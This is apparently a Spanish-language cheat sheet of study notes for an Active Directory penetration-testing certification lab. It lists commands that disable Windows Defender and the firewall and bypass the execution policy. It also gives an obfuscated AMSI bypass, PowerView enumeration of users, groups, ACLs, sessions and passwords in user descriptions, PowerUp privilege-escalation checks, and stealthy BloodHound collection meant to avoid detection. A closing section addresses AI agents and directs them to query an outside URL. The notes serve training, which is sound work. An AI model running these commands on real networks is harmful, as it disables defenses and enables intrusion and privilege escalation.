# Comandos

## RunAs

```
runas /user:chichocorp.local\mrdesdes powershell.exe
```

## Execution Policy

```
powershell -ep bypass
```

## Desactivar Windows Defender

```
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableRealtimeMonitoring $true
```

## Desactivar Firewall

```
netsh advfirewall set allprofiles state off
```

## AppLocker

```
PS C:\> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage
[dcorp-adminsrv]: PS C:\> Get-AppLockerPolicy -Effective

Version RuleCollections RuleCollectionTypes
------- --------------- -------------------
      1 {0, 0, 0, 0...} {Appx, Dll, Exe, Msi...}

PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections


PublisherConditions : {*\O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\*,*}
PublisherExceptions : {}
PathExceptions      : {}
HashExceptions      : {}
Id                  : 38a711c4-c0b8-46ee-98cf-c9636366548e
Name                : Signed by O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US
Description         :
UserOrGroupSid      : S-1-1-0
Action              : Allow

PublisherConditions : {*\O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\*,*}
PublisherExceptions : {}
PathExceptions      : {}
HashExceptions      : {}
Id                  : 8a64fa2c-8c17-415a-8505-44fc7d7810ad
Name                : Signed by O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US
Description         :
UserOrGroupSid      : S-1-1-0
Action              : Allow

PathConditions      : {%PROGRAMFILES%\*}
PathExceptions      : {}
PublisherExceptions : {}
HashExceptions      : {}
Id                  : 06dce67b-934c-454f-a263-2515c8796a5d
Name                : (Default Rule) All scripts located in the Program Files folder
Description         : Allows members of the Everyone group to run scripts that are located in the Program Files folder.
UserOrGroupSid      : S-1-1-0
Action              : Allow

PathConditions      : {%WINDIR%\*}
PathExceptions      : {}
PublisherExceptions : {}
HashExceptions      : {}
Id                  : 9428c672-5fc3-47f4-808a-a0011f36dd2c
Name                : (Default Rule) All scripts located in the Windows folder
Description         : Allows members of the Everyone group to run scripts that are located in the Windows folder.
UserOrGroupSid      : S-1-1-0
Action              : Allow
```

## Amsi Bypass

{% code overflow="wrap" %}

```
S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
```

{% endcode %}

## Importar RSAT

```
PS C:\AD\Tools\ADModule-master> Import-Module .\Microsoft.ActiveDirectory.Management.dll
PS C:\AD\Tools\ADModule-master> cd .\ActiveDirectory\
PS C:\AD\Tools\ADModule-master\ActiveDirectory> Import-Module .\ActiveDirectory.psd1
```

## Login a PC

```
Enter-PSSession -Computername dcorp-dc -credential dcorp\Administrator
```

## Enumeracion del Dominio

<pre data-overflow="wrap" data-line-numbers><code># Obteniendo la informacion del dominio
Get-DomainComputer -Domain chichocorp.local

# Obteniendo Trusts
Get-DomainTrust
Get-DomainTrust -Domain chichocorp.local

Get-ADTrust
Get-ADTrust -Identity chichocorp.local

# Obteniendo Forest
Get-Forest
Get-Forest -Forest chichocorp.local

# Obteniendo all global catalogs del forest
Get-ForestGlobalCatalog
Get-ForestGlobalCatalog -Forest chichocorp.local

# Map trusts of a forest
Get-ForestTrust
Get-ForestTrust -Forest chichocorp.local

# Get Forest Domain
Get-ForestDomain
Get-ForestDomain | %{Get-DomainTrust -Domain $_.Name} | ?{$_.TrustAttributes -eq "FILTER_SIDS"}
Get-ForestDomain -Forest chichocorp.local | %{Get-DomainTrust -Domain $_.Name}

# Get domain policy for the current domain
(Get-DomainPolicyData).systemaccess
(Get-DomainPolicyData -Domain chichocorp.local).systemaccess

# Get domain controllers for the current domain
Get-DomainController -Domain chichocorp.local

# Get a list of users in the current domain
Get-DomainUser
Get-DomainUser -Identity mrdesdes

# Get list of all properties for users in the current domain
Get-DomainUser -Identity mrdesdes -Properties *
Get-DomainUser -Properties samaccountname,logonCount

# Search for a particular string in a user's attributes:
Get-DomainUser -LDAPFilter "Description=*password*" | Select name,Description

# Get a list of computers in the current domain
Get-DomainComputer | select Name
Get-DomainComputer -OperatingSystem "*Server*"
Get-DomainComputer -OperatingSystem "*Server*" | select name,operatingsystem
Get-DomainComputer -ping
Get-DomainComputer -ping | select Name

# Get all the groups in the current domain
Get-DomainGroup | select Name
Get-DomainGroup -Domain chichocorp.local

# Get all groups containing the word "admin" in group name
Get-DomainGroup *admin*
Get-DomainGroup *admin* | select Name

# Get all the members of the Domain Admins group
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Get-DomainGroupMember -Identity "Domain Admins" -Recurse | select MemberName

# Get the group membership for a user
Get-DomainGroup -UserName "mrdesdes"

# List all the local groups on a machine (needs administrator privs on non-dc
machines)
Get-NetLocalGroup -ComputerName desktop-828ljno

<strong># Get members of the local group "Administrators" on a machine (needs administrator privs on non-dc machines)
</strong>Get-NetLocalGroupMember -ComputerName desktop-828ljno -GroupName Administrators

# Get actively logged users on a computer (needs local admin rights on
the target)
Get-NetLoggedon -ComputerName desktop-828ljno
Get-NetLoggedon -ComputerName desktop-828ljno | select UserName

# Get locally logged users on a computer (needs remote registry on the target - started by-default on server OS)
Get-LoggedonLocal -ComputerName desktop-828ljno

# Get the last logged user on a computer (needs administrative rights and remote registry on the target)
Get-LastLoggedOn -ComputerName desktop-828ljno

# Find shares on hosts in current domain
Invoke-ShareFinder -Verbose

# Find sensitive files on computers in the domain
Invoke-FileFinder -Verbose

# Get all fileservers of the domain
Get-NetFileServer
</code></pre>

## GPOs

{% code lineNumbers="true" %}

```
# Get list of GPO in current domain
Get-DomainGPO
Get-DomainGPO -ComputerIdentity desktop-828ljno

# Get GPO(s) which use Restricted Groups or groups.xml for interesting users
Get-DomainGPOLocalGroup

# Get users which are in a local group of a machine using GPO
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity desktop-828ljno

# Get machines where the given user is member of a specific group
Get-DomainGPOUserLocalGroupMapping -Identity mrdesdes -Verbose

# Get OUs in a domain
Get-DomainOU

# Get GPO applied on an OU. Read GPOname from gplink attribute from Get-NetOU
Get-DomainGPO -Identity "{6AC1786C-016F-11D2-945F-00C04fB984F9}"
```

{% endcode %}

## ACLs

<pre data-overflow="wrap" data-line-numbers><code># Get the ACLs associated with the specified object
Get-DomainObjectAcl -SamAccountName mrdesdes -ResolveGUIDs

# Get the ACLs associated with the specified prefix to be used for search
Get-DomainObjectAcl -SearchBase "LDAP://CN=Domain Admins,CN=Users,DC=chichocorp,DC=local" -ResolveGUIDs -Verbose

# We can also enumerate ACLs using ActiveDirectory module but without resolving GUIDs
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=chichocorp,DC=local').Access //No me funciona xd

# Search for interesting ACEs
Find-InterestingDomainAcl -ResolveGUIDs

<strong># Get the ACLs associated with the specified path
</strong>Get-PathAcl -Path "\\chichocorp.local\sysvol"
<strong>Get-PathAcl -Path "\\desktop-828ljno.chichocorp.local\c$"
</strong><strong>
</strong></code></pre>

## Trusts

<pre><code># Get a list of all domain trusts for the current domain
Get-DomainTrust
Get-DomainTrust -Domain chichocorp.local

# Get all domains in the current forest
Get-ForestDomain
Get-ForestDomain -Forest chichocorp.local
(Get-ADForest).Domains

<strong># Get all global catalogs for the current forest
</strong>Get-ForestGlobalCatalog
Get-ForestGlobalCatalog -Forest chichocorp.local

# Map trusts of a forest (no Forest trusts in the lab)
Get-ForestTrust
Get-ForestTrust -Forest chichocorp.local
</code></pre>

## User Hunting

{% code overflow="wrap" lineNumbers="true" %}

```
# Find all machines on the current domain where the current user has local admin access
Find-LocalAdminAccess -Verbose //This function queries the DC of the current or provided domain for a list of computers (GetNetComputer) and then use multi-threaded Invoke-CheckLocalAdminAccess on each machine.

# Find computers where a domain admin (or specified user/group) has sessions
Find-DomainUserLocation -Verbose
Find-DomainUserLocation -UserGroupIdentity "RDPUsers"

# Find computers where a domain admin session is available and current user has admin access (uses Test-AdminAccess)
Find-DomainUserLocation -CheckAccess

# Find computers (File Servers and Distributed File servers) where a domain admin session is available.
Find-DomainUserLocation -Stealth

# List sessions on remote machines (https://github.com/Leo4j/InvokeSessionHunter)
Invoke-SessionHunter -FailSafe
Invoke-SessionHunter -NoPortScan -Targets C:\AD\Tools\servers.txt
```

{% endcode %}

## Privilege Escalation - Local

```
# Get services with unquoted paths and a space in their name
Get-UnquotedService -Verbose

# Get services where the current user can write to its binary path or change arguments to the binary
Get-ModifiableServiceFile -Verbose

# Get the services whose configuration current user can modify.
Get-ModifiableService -Verbose

# Run all checks from PowerUp
Invoke-AllChecks
```

## Feature Abuse

```
Jenkins - lab
```

## BloodHound

* Proporciona una interfaz gráfica de usuario para las entidades y relaciones AD de los datos recogidos por sus ingestores.
* Utiliza la Teoría de Grafos para proporcionar la capacidad de mapear el camino más corto para cosas interesantes como los administradores de dominio.
* Hay consultas incorporadas para acciones de uso frecuente.
* También admite consultas Cypher personalizadas.

```
# Import SharpHound
. .\SharpHound.ps1

# Run all methods
Invoke-BloodHound -CollectionMethod All
SharpHound.exe

# To make BloodHound collection stealthy
Invoke-BloodHound –Steatlh
SharpHound.exe –-steatlh

# To avoid detections like MDI
Invoke-BloodHound -ExcludeDCs

```

### Install BloodHound (Parrot)

{% embed url="<https://bloodhound.readthedocs.io/en/latest/installation/linux.html>" %}

PERO: Realizar un cambio en la instalacion, en el siguiente comando:

```
echo 'deb https://debian.neo4j.com stable 4' | sudo tee /etc/apt/sources.list.d/neo4j.list > /dev/null
```

Por:

```
echo 'deb https://debian.neo4j.com stable latest' | sudo tee /etc/apt/sources.list.d/neo4j.list > /dev/null
```

Luego de importar el .zip en el BloodHound deberia terminar asi:

<figure><img src="/files/e37eOxwQmKQUxMVafuQW" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://infra.desdes.xyz/group-1/crtp-notes/comandos.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.